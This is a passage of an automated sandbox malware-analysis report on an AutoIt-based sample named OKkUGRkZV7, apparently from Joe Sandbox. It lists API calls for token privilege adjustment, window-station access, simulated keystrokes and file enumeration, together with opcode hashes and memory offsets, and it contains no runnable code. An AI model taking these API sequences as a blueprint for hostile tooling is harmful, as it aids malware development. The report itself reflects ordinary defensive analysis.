                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 1ae1c48679b6b2f114c07c9a019fded545236127864d2326fb7410a615e64069
                                              • Instruction ID: 142c24800aa48951444e9e7bbf77153a4b4c0d0afed6d0ecaf9f27d4f34f8967
                                              • Opcode Fuzzy Hash: 1ae1c48679b6b2f114c07c9a019fded545236127864d2326fb7410a615e64069
                                              • Instruction Fuzzy Hash: EA01D172200225ABCB19DF2DC8819ABB7A9EF85364714843EE90ACF205E631E90187A0
                                              APIs
                                              • __lock_file.LIBCMT ref: 003648A6
                                                • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2597487223-0
                                              • Opcode ID: cf14e3f48ebb70675c1cc31ac62b035473c01f6b3d6db1a179e456d95e37a397
                                              • Instruction ID: dd985b371327945350ce760b672fb30f602ac6707d3aca785c2d9663e70c2238
                                              • Opcode Fuzzy Hash: cf14e3f48ebb70675c1cc31ac62b035473c01f6b3d6db1a179e456d95e37a397
                                              • Instruction Fuzzy Hash: 35F0AF71D00609ABDF13AFA88C067AE36A1AF00325F15C514F4249F199CBB9C951DF51
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344E7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: f655ff83fe0df26ba1b1339a6eb0e63f1e108d1a3bf1138aaf267e173edc5f19
                                              • Instruction ID: c026a941badee23cc9ac704594b736abf63a7e956631a39d4f9b0719f768549f
                                              • Opcode Fuzzy Hash: f655ff83fe0df26ba1b1339a6eb0e63f1e108d1a3bf1138aaf267e173edc5f19
                                              • Instruction Fuzzy Hash: 25F06D71501711CFCB369F64E494912BBF5BF143293258A3EE1D78AA20C772B880DF40
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003607B0
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: 2c6d64d83487c6f8a0654c70a4378690e1e117302aae80a131cd074c06d6779c
                                              • Instruction ID: 16d10b178b5dae8ea05da1d157e944104e5262aa7e75098c33357669db383a2d
                                              • Opcode Fuzzy Hash: 2c6d64d83487c6f8a0654c70a4378690e1e117302aae80a131cd074c06d6779c
                                              • Instruction Fuzzy Hash: D4E0CD379041285BC722D65C9C05FEA77DDDF897A0F0441B5FD0CDB204DA64AC8087D0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                              • Instruction ID: fc83322b9bb4898e0730ab9b07c6f2d628602ddd62720cccce0eeaebcb365663
                                              • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                              • Instruction Fuzzy Hash: 75E092B0504B009BD7398B24D800BA373E1EB06304F00091DF2AB83241EB6278418759
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 0169491B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction ID: 49bbc72d91e30191ad65715fbfbef5670d62168474abe0d4d5248d1cbd2280f8
                                              • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction Fuzzy Hash: ABE08C32A05208EBDF20CEA88E14BA973ACD706320F004754E90AC3380DA318A439614
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 016948EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction ID: e7882d4ab05795fd1437cc505ffea2fad405148888854d8923de39101cf32ff1
                                              • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction Fuzzy Hash: 5DD0A73090620CEBCF10CFB8AE049DA77ACDB04320F004754FD15C7281DA319941D790
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: 1826a141e7f02041c754d832ff0ba665d823d52e81cb0b01d15ef6abd7d0e8ee
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: 18B0927644020C77CE022A82EC02A493B299B41764F408020FB0C1C162A673A6649A89
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 01696311
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction ID: 40f047ab5acdfc7e248f06dcabe9d6a8c5fab7b3b51ca721a68e3389ca672630
                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction Fuzzy Hash: AAE09A7494020DAFDB00EFB4D94969E7BB4EF04301F1005A1FD0596681DA319A548A62
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 01696311
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: a139fd02ecc4d0688fad4978bcd0f10d4e92ba9744d9538ee2d2641108514a98
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 8DE0E67494020DDFDB00EFB4D94969E7FB4EF04301F100161FD01D2281D6319D508A62
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003CCB37
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCB95
                                              • GetWindowLongW.USER32(?,000000F0), ref: 003CCBD6
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCC00
                                              • SendMessageW.USER32 ref: 003CCC29
                                              • _wcsncpy.LIBCMT ref: 003CCC95
                                              • GetKeyState.USER32(00000011), ref: 003CCCB6
                                              • GetKeyState.USER32(00000009), ref: 003CCCC3
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCCD9
                                              • GetKeyState.USER32(00000010), ref: 003CCCE3
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCD0C
                                              • SendMessageW.USER32 ref: 003CCD33
                                              • SendMessageW.USER32(?,00001030,?,003CB348), ref: 003CCE37
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003CCE4D
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003CCE60
                                              • SetCapture.USER32(?), ref: 003CCE69
                                              • ClientToScreen.USER32(?,?), ref: 003CCECE
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003CCEDB
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003CCEF5
                                              • ReleaseCapture.USER32 ref: 003CCF00
                                              • GetCursorPos.USER32(?), ref: 003CCF3A
                                              • ScreenToClient.USER32(?,?), ref: 003CCF47
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CCFA3
                                              • SendMessageW.USER32 ref: 003CCFD1
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD00E
                                              • SendMessageW.USER32 ref: 003CD03D
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003CD05E
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003CD06D
                                              • GetCursorPos.USER32(?), ref: 003CD08D
                                              • ScreenToClient.USER32(?,?), ref: 003CD09A
                                              • GetParent.USER32(?), ref: 003CD0BA
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CD123
                                              • SendMessageW.USER32 ref: 003CD154
                                              • ClientToScreen.USER32(?,?), ref: 003CD1B2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003CD1E2
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD20C
                                              • SendMessageW.USER32 ref: 003CD22F
                                              • ClientToScreen.USER32(?,?), ref: 003CD281
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003CD2B5
                                                • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 003CD351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$F$pb@
                                              • API String ID: 3977979337-1958197849
                                              • Opcode ID: 290686a024506676675a4fa987535de2edd485cf6f6373e007acbcb14f7e8e0e
                                              • Instruction ID: 137ed192ac2cfa7c2d0b0f0bf9e72148bc668a33cf0d3a6874a66fa70da5d59e
                                              • Opcode Fuzzy Hash: 290686a024506676675a4fa987535de2edd485cf6f6373e007acbcb14f7e8e0e
                                              • Instruction Fuzzy Hash: 39428A35214240AFDB22DF64C848FAABBE9FF49310F15492DF659DB2A0C731AC51DB91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove$_memset
                                              • String ID: ]?$3c5$DEFINE$P\?$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_5
                                              • API String ID: 1357608183-2281723495
                                              • Opcode ID: c000aeea39527d0ee249ba9fa581ae8f2311236d1f9aef0b7b425f0712274bdd
                                              • Instruction ID: e6f46c7a0f90dd140bcb78b5af1e7dc7719b810e6bcade37240950b3a4636edf
                                              • Opcode Fuzzy Hash: c000aeea39527d0ee249ba9fa581ae8f2311236d1f9aef0b7b425f0712274bdd
                                              • Instruction Fuzzy Hash: C793A075E04219DBDF26CF98D881BADB7B1FF48310F25816AE945AB391E7709E81CB40
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 003448DF
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0037D665
                                              • IsIconic.USER32(?), ref: 0037D66E
                                              • ShowWindow.USER32(?,00000009), ref: 0037D67B
                                              • SetForegroundWindow.USER32(?), ref: 0037D685
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0037D69B
                                              • GetCurrentThreadId.KERNEL32 ref: 0037D6A2
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037D6AE
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037D6BF
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037D6C7
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0037D6CF
                                              • SetForegroundWindow.USER32(?), ref: 0037D6D2
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D6E7
                                              • keybd_event.USER32(00000012,00000000), ref: 0037D6F2
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D6FC
                                              • keybd_event.USER32(00000012,00000000), ref: 0037D701
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D70A
                                              • keybd_event.USER32(00000012,00000000), ref: 0037D70F
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D719
                                              • keybd_event.USER32(00000012,00000000), ref: 0037D71E
                                              • SetForegroundWindow.USER32(?), ref: 0037D721
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0037D748
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: 7f49a6566f40433d50aab7266e686a7c9c9cc16e0afaaf333c93c7d45b9bcd2f
                                              • Instruction ID: 092e0ae0e34ea811e8681c2c7415e6d491c24b526ee3bd6598968eb79b335587
                                              • Opcode Fuzzy Hash: 7f49a6566f40433d50aab7266e686a7c9c9cc16e0afaaf333c93c7d45b9bcd2f
                                              • Instruction Fuzzy Hash: E2317271A40318BFEB226F619C89F7F7E6DEF44B50F114025FA09EA1D1C6B46910ABA0
                                              APIs
                                                • Part of subcall function 003987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039882B
                                                • Part of subcall function 003987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398858
                                                • Part of subcall function 003987E1: GetLastError.KERNEL32 ref: 00398865
                                              • _memset.LIBCMT ref: 00398353
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003983A5
                                              • CloseHandle.KERNEL32(?), ref: 003983B6
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003983CD
                                              • GetProcessWindowStation.USER32 ref: 003983E6
                                              • SetProcessWindowStation.USER32(00000000), ref: 003983F0
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0039840A
                                                • Part of subcall function 003981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00398309), ref: 003981E0
                                                • Part of subcall function 003981CB: CloseHandle.KERNEL32(?,?,00398309), ref: 003981F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: e95445e5511a55e4fa238e9c714c34f1cd8bb66df12f9d858a2bf3631b2f5002
                                              • Instruction ID: 9b1eacead49812b5726ed859b0b634bb0fa4e7f998a0c7fa39c4e35ec69fdf62
                                              • Opcode Fuzzy Hash: e95445e5511a55e4fa238e9c714c34f1cd8bb66df12f9d858a2bf3631b2f5002
                                              • Instruction Fuzzy Hash: 2A8177B1900209AFDF129FA5CC45EFEBBB9FF46304F158169F910A6261DB319E18DB20
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 003AC78D
                                              • FindClose.KERNEL32(00000000), ref: 003AC7E1
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC806
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC81D
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 003AC844
                                              • __swprintf.LIBCMT ref: 003AC890
                                              • __swprintf.LIBCMT ref: 003AC8D3
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              • __swprintf.LIBCMT ref: 003AC927
                                                • Part of subcall function 00363698: __woutput_l.LIBCMT ref: 003636F1
                                              • __swprintf.LIBCMT ref: 003AC975
                                                • Part of subcall function 00363698: __flsbuf.LIBCMT ref: 00363713
                                                • Part of subcall function 00363698: __flsbuf.LIBCMT ref: 0036372B
                                              • __swprintf.LIBCMT ref: 003AC9C4
                                              • __swprintf.LIBCMT ref: 003ACA13
                                              • __swprintf.LIBCMT ref: 003ACA62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: e08f3ca68430eaa0e8d88dddde65d79a1963b31120a7d56f86151dc3e746735b
                                              • Instruction ID: 10e154fb380002d15e9106d4c942cd221b7391c61119022ec1b616356a3888b9
                                              • Opcode Fuzzy Hash: e08f3ca68430eaa0e8d88dddde65d79a1963b31120a7d56f86151dc3e746735b
                                              • Instruction Fuzzy Hash: C6A120B1414345ABC712EFA4C885EAFB7ECFF95704F40491AF595CA191EB34EA08CB62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 003AEFB6
                                              • _wcscmp.LIBCMT ref: 003AEFCB
                                              • _wcscmp.LIBCMT ref: 003AEFE2
                                              • GetFileAttributesW.KERNEL32(?), ref: 003AEFF4
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 003AF00E
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 003AF026
                                              • FindClose.KERNEL32(00000000), ref: 003AF031
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF04D
                                              • _wcscmp.LIBCMT ref: 003AF074
                                              • _wcscmp.LIBCMT ref: 003AF08B
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF09D
                                              • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF0BB
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF0C5
                                              • FindClose.KERNEL32(00000000), ref: 003AF0D2
                                              • FindClose.KERNEL32(00000000), ref: 003AF0E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: 610c79404053e4166d26f7911f14b8d9e19d529f73e8993a812e91985bca2a4a
                                              • Instruction ID: aaf96ae10375eadcf8459bfa240e75b1c46f19a1d5243a549438dfa551179261
                                              • Opcode Fuzzy Hash: 610c79404053e4166d26f7911f14b8d9e19d529f73e8993a812e91985bca2a4a
                                              • Instruction Fuzzy Hash: B031BF365012186EDB16EBB4EC48EEEB7ADDF4A360F114176E904E30A1DB70EE44CB65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
